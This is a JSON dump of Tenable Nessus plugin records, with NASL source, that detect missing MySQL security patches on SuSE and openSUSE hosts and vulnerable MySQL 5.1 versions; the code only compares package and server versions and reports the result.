{"nessus": [{"lastseen": "2018-09-01T23:41:50", "references": ["http://support.novell.com/security/cve/CVE-2009-4028.html", "http://support.novell.com/security/cve/CVE-2009-4030.html", "http://support.novell.com/security/cve/CVE-2008-7247.html", "http://support.novell.com/security/cve/CVE-2009-4019.html", "http://support.novell.com/security/cve/CVE-2009-4484.html"], "pluginID": "45107", "description": "This update fixes various security issues (bnc#557669) :\n\nupstream #47320 - checking server certificates (CVE-2009-4028) upstream #48291 - error handling in subqueries (CVE-2009-4019) upstream #47780 - preserving null_value flag in GeomFromWKB() (CVE-2009-4019) upstream #39277 - symlink behaviour fixed (CVE-2008-7247) upstream #32167 - symlink behaviour refixed (CVE-2009-4030) fixing remote buffer overflow. (CVE-2009-4484)", "edition": 5, "reporter": "Tenable", "published": "2010-03-19T00:00:00", "title": "SuSE 10 Security Update : MySQL (ZYPP Patch Number 6897)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-4030", "CVE-2009-4028", "CVE-2008-7247", "CVE-2009-4019", "CVE-2009-4484"], "modified": "2016-12-22T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_MYSQL-6897.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=45107", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(45107);\n script_version (\"$Revision: 1.9 $\");\n script_cvs_date(\"$Date: 2016/12/22 20:42:28 $\");\n\n script_cve_id(\"CVE-2008-7247\", \"CVE-2009-4019\", \"CVE-2009-4028\", \"CVE-2009-4030\", \"CVE-2009-4484\");\n\n script_name(english:\"SuSE 10 Security Update : MySQL (ZYPP Patch Number 6897)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes various security issues (bnc#557669) :\n\nupstream #47320 - checking server certificates (CVE-2009-4028)\nupstream #48291 - error handling in subqueries (CVE-2009-4019)\nupstream #47780 - preserving null_value flag in GeomFromWKB()\n(CVE-2009-4019) upstream #39277 - symlink behaviour fixed\n(CVE-2008-7247) upstream #32167 - symlink behaviour refixed\n(CVE-2009-4030) fixing remote buffer overflow. (CVE-2009-4484)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-7247.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-4019.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-4028.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-4030.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-4484.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 6897.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MySQL yaSSL CertDecoder::GetName Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(20, 59, 119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/03/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/03/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2016 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"mysql-5.0.26-12.24.5\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"mysql-client-5.0.26-12.24.5\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"mysql-devel-5.0.26-12.24.5\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"mysql-shared-5.0.26-12.24.5\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, cpu:\"x86_64\", reference:\"mysql-shared-32bit-5.0.26-12.24.5\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"mysql-5.0.26-12.24.5\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"mysql-Max-5.0.26-12.24.5\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"mysql-client-5.0.26-12.24.5\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"mysql-devel-5.0.26-12.24.5\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"mysql-shared-5.0.26-12.24.5\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"x86_64\", reference:\"mysql-shared-32bit-5.0.26-12.24.5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-11-17T02:59:01", "references": ["https://bugs.mysql.com/bug.php?id=47320", "https://marc.info/?l=oss-security&m=125908080222685&w=2", "https://bugs.mysql.com/bug.php?id=39277", "http://bugs.mysql.com/bug.php?id=32167", "https://bugs.mysql.com/bug.php?id=47780", "https://bugs.mysql.com/bug.php?id=48291", "https://marc.info/?l=oss-security&m=125908040022018&w=2", "http://dev.mysql.com/doc/refman/5.1/en/news-5-1-41.html"], "pluginID": "42900", "description": "The version of MySQL 5.1 installed on the remote host is earlier than 5.1.41 and is, therefore, potentially affected by the following vulnerabilities :\n\n - An incomplete fix was provided in 5.1.24 for CVE-2008-2079, a symlink-related privilege escalation issue. (Bug #39277)\n\n - MySQL clients linked against OpenSSL are vulnerable to man-in-the-middle attacks. (Bug #47320)\n\n - The GeomFromWKB() function can be manipulated to cause a denial of service. (Bug #47780)\n\n - Specially crafted SELECT statements containing sub- queries in the WHERE clause can cause the server to crash. (Bug #48291)", "edition": 8, "reporter": "Tenable", "published": "2009-11-25T00:00:00", "title": "MySQL 5.1 < 5.1.41 Multiple Vulnerabilities", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Databases", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-4030", "CVE-2009-4028", "CVE-2008-2079", "CVE-2008-7247", "CVE-2009-4019"], "modified": "2018-11-15T00:00:00", "cpe": ["cpe:/a:mysql:mysql"], "id": "MYSQL_5_1_41.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=42900", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(42900);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2018/11/15 20:50:21\");\n\n script_cve_id(\n \"CVE-2008-2079\",\n \"CVE-2008-7247\",\n \"CVE-2009-4019\",\n \"CVE-2009-4028\",\n \"CVE-2009-4030\"\n );\n script_bugtraq_id(37075, 37076, 37297, 38043);\n script_xref(name:\"Secunia\", value:\"37372\");\n\n script_name(english:\"MySQL 5.1 < 5.1.41 Multiple Vulnerabilities\");\n script_summary(english:\"Checks version of MySQL 5.1 Server\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote database server is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of MySQL 5.1 installed on the remote host is earlier than\n5.1.41 and is, therefore, potentially affected by the following\nvulnerabilities :\n\n - An incomplete fix was provided in 5.1.24 for\n CVE-2008-2079, a symlink-related privilege\n escalation issue. (Bug #39277)\n\n - MySQL clients linked against OpenSSL are vulnerable\n to man-in-the-middle attacks. (Bug #47320)\n\n - The GeomFromWKB() function can be manipulated\n to cause a denial of service. (Bug #47780)\n\n - Specially crafted SELECT statements containing sub-\n queries in the WHERE clause can cause the server\n to crash. (Bug #48291)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.mysql.com/bug.php?id=39277\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.mysql.com/bug.php?id=47320\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.mysql.com/bug.php?id=47780\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.mysql.com/bug.php?id=48291\");\n script_set_attribute(attribute:\"see_also\", value:\"http://dev.mysql.com/doc/refman/5.1/en/news-5-1-41.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://marc.info/?l=oss-security&m=125908080222685&w=2\");\n script_set_attribute(attribute:\"see_also\", value:\"https://marc.info/?l=oss-security&m=125908040022018&w=2\");\n script_set_attribute(attribute:\"see_also\", value:\"http://bugs.mysql.com/bug.php?id=32167\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to MySQL 5.1.41 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 59, 264);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/11/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/11/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/11/25\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mysql:mysql\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Databases\");\n\n script_copyright(english:\"This script is Copyright (C) 2009-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mysql_version.nasl\", \"mysql_login.nasl\");\n script_require_keys(\"Settings/ParanoidReport\");\n script_require_ports(\"Services/mysql\", 3306);\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"mysql_func.inc\");\n\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nport = get_service(svc:\"mysql\", default:3306, exit_on_fail:TRUE);\nvuln = FALSE;\n\nif (mysql_init(port:port, exit_on_fail:TRUE) == 1)\n{\n variant = mysql_get_variant();\n version = mysql_get_version();\n ver_fields = split(version, sep:'.', keep:FALSE);\n major = int(ver_fields[0]);\n minor = int(ver_fields[1]);\n rev = int(ver_fields[2]);\n\n if (\n !isnull(variant) && \"Community\" >< variant &&\n strlen(version) &&\n major == 5 && minor == 1 && rev < 41\n )\n {\n vuln = TRUE;\n }\n}\nelse exit(1, \"Can't establish a MySQL connection on port \"+port+\".\");\n\nmysql_close();\n\nif (vuln)\n{\n if (report_verbosity > 0)\n {\n report = '\nInstalled version : ' + version + '\nFixed version : 5.1.41\n';\n datadir = get_kb_item('mysql/' + port + '/datadir');\n if (!empty_or_null(datadir))\n {\n report += ' Data Dir : ' + datadir + '\\n';\n }\n databases = get_kb_item('mysql/' + port + '/databases');\n if (!empty_or_null(databases))\n { \n report += ' Databases :\\n' + databases;\n }\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n}\nelse\n{\n if (isnull(variant)) exit(1, \"Can't determine the variant of MySQL listening on port \"+port+\".\");\n else if (\"Community\" >< variant) exit(0, \"MySQL version \"+version+\" is listening on port \"+port+\" and is not affected.\");\n else exit(0, \"MySQL \"+variant+\" is listening on port \"+port+\" and is not affected.\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-11-13T16:45:56", "references": ["https://lists.opensuse.org/opensuse-updates/2010-05/msg00000.html", "https://bugzilla.novell.com/show_bug.cgi?id=557669"], "pluginID": "46218", "description": "This update fixes several security issues in mysql :\n\n - checking server certificates (CVE-2009-4028)\n\n - error handling in subqueries (CVE-2009-4019)\n\n - preserving null_value flag in GeomFromWKB (CVE-2009-4019)\n\n - symlink behavior fixed (CVE-2008-7247)\n\n - symlink behavior refixed (CVE-2009-4030)", "edition": 6, "reporter": "Tenable", "published": "2010-05-04T00:00:00", "title": "openSUSE Security Update : libmysqlclient-devel (openSUSE-SU-2010:0198-1)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-4030", "CVE-2009-4028", "CVE-2008-7247", "CVE-2009-4019"], "modified": "2018-11-10T00:00:00", "cpe": ["cpe:/o:novell:opensuse:11.0", "p-cpe:/a:novell:opensuse:mysql", "p-cpe:/a:novell:opensuse:mysql-client", "p-cpe:/a:novell:opensuse:libmysqlclient_r15-32bit", "p-cpe:/a:novell:opensuse:mysql-tools", "p-cpe:/a:novell:opensuse:libmysqlclient-devel", "p-cpe:/a:novell:opensuse:mysql-Max", "p-cpe:/a:novell:opensuse:libmysqlclient15-32bit", "p-cpe:/a:novell:opensuse:mysql-debug", "p-cpe:/a:novell:opensuse:libmysqlclient_r15", "p-cpe:/a:novell:opensuse:mysql-bench", "p-cpe:/a:novell:opensuse:libmysqlclient15"], "id": "SUSE_11_0_LIBMYSQLCLIENT-DEVEL-091216.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=46218", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update libmysqlclient-devel-1706.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(46218);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2018/11/10 11:49:58\");\n\n script_cve_id(\"CVE-2008-7247\", \"CVE-2009-4019\", \"CVE-2009-4028\", \"CVE-2009-4030\");\n\n script_name(english:\"openSUSE Security Update : libmysqlclient-devel (openSUSE-SU-2010:0198-1)\");\n script_summary(english:\"Check for the libmysqlclient-devel-1706 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes several security issues in mysql :\n\n - checking server certificates (CVE-2009-4028)\n\n - error handling in subqueries (CVE-2009-4019)\n\n - preserving null_value flag in GeomFromWKB\n (CVE-2009-4019)\n\n - symlink behavior fixed (CVE-2008-7247)\n\n - symlink behavior refixed (CVE-2009-4030)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=557669\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2010-05/msg00000.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libmysqlclient-devel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_cwe_id(20, 59);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient15\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient15-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient_r15\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient_r15-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-Max\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-bench\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/05/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.0\", reference:\"libmysqlclient-devel-5.0.51a-27.6\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"libmysqlclient15-5.0.51a-27.6\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"libmysqlclient_r15-5.0.51a-27.6\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"mysql-5.0.51a-27.6\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"mysql-Max-5.0.51a-27.6\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"mysql-bench-5.0.51a-27.6\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"mysql-client-5.0.51a-27.6\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"mysql-debug-5.0.51a-27.6\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"mysql-tools-5.0.51a-27.6\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", cpu:\"x86_64\", reference:\"libmysqlclient15-32bit-5.0.51a-27.6\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", cpu:\"x86_64\", reference:\"libmysqlclient_r15-32bit-5.0.51a-27.6\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libmysqlclient-devel / libmysqlclient15 / libmysqlclient15-32bit / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-11-13T17:01:54", "references": ["https://lists.opensuse.org/opensuse-updates/2010-05/msg00000.html", "https://bugzilla.novell.com/show_bug.cgi?id=557669"], "pluginID": "46220", "description": "This update fixes several security issues in mysql :\n\n - checking server certificates (CVE-2009-4028)\n\n - error handling in subqueries (CVE-2009-4019)\n\n - preserving null_value flag in GeomFromWKB (CVE-2009-4019)\n\n - symlink behavior fixed (CVE-2008-7247)\n\n - symlink behavior refixed (CVE-2009-4030)", "edition": 6, "reporter": "Tenable", "published": "2010-05-04T00:00:00", "title": "openSUSE Security Update : libmysqlclient-devel (openSUSE-SU-2010:0198-1)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-4030", "CVE-2009-4028", "CVE-2008-7247", "CVE-2009-4019"], "modified": "2018-11-10T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:mysql-test", "p-cpe:/a:novell:opensuse:libmysqlclient16-32bit", "p-cpe:/a:novell:opensuse:libmysqld-devel", "p-cpe:/a:novell:opensuse:mysql-ndb-storage", "p-cpe:/a:novell:opensuse:mysql-ndb-management", "p-cpe:/a:novell:opensuse:mysql", "p-cpe:/a:novell:opensuse:mysql-client", "p-cpe:/a:novell:opensuse:libmysqlclient16", "cpe:/o:novell:opensuse:11.2", "p-cpe:/a:novell:opensuse:mysql-ndb-tools", "p-cpe:/a:novell:opensuse:mysql-tools", "p-cpe:/a:novell:opensuse:mysql-ndb-extra", "p-cpe:/a:novell:opensuse:libmysqlclient-devel", "p-cpe:/a:novell:opensuse:mysql-debug", "p-cpe:/a:novell:opensuse:libmysqlclient_r16", "p-cpe:/a:novell:opensuse:libmysqlclient_r16-32bit", "p-cpe:/a:novell:opensuse:mysql-bench"], "id": "SUSE_11_2_LIBMYSQLCLIENT-DEVEL-091215.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=46220", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update libmysqlclient-devel-1706.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(46220);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2018/11/10 11:49:58\");\n\n script_cve_id(\"CVE-2008-7247\", \"CVE-2009-4019\", \"CVE-2009-4028\", \"CVE-2009-4030\");\n\n script_name(english:\"openSUSE Security Update : libmysqlclient-devel (openSUSE-SU-2010:0198-1)\");\n script_summary(english:\"Check for the libmysqlclient-devel-1706 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes several security issues in mysql :\n\n - checking server certificates (CVE-2009-4028)\n\n - error handling in subqueries (CVE-2009-4019)\n\n - preserving null_value flag in GeomFromWKB\n (CVE-2009-4019)\n\n - symlink behavior fixed (CVE-2008-7247)\n\n - symlink behavior refixed (CVE-2009-4030)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=557669\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2010-05/msg00000.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libmysqlclient-devel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_cwe_id(20, 59);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient16\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient16-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient_r16\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient_r16-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqld-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-bench\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-ndb-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-ndb-management\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-ndb-storage\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-ndb-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/05/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.2\", reference:\"libmysqlclient-devel-5.1.36-6.8.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"libmysqlclient16-5.1.36-6.8.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"libmysqlclient_r16-5.1.36-6.8.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"libmysqld-devel-5.1.36-6.8.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"mysql-5.1.36-6.8.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"mysql-bench-5.1.36-6.8.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"mysql-client-5.1.36-6.8.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"mysql-debug-5.1.36-6.8.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"mysql-ndb-extra-5.1.36-6.8.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"mysql-ndb-management-5.1.36-6.8.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"mysql-ndb-storage-5.1.36-6.8.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"mysql-ndb-tools-5.1.36-6.8.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"mysql-test-5.1.36-6.8.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"mysql-tools-5.1.36-6.8.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", cpu:\"x86_64\", 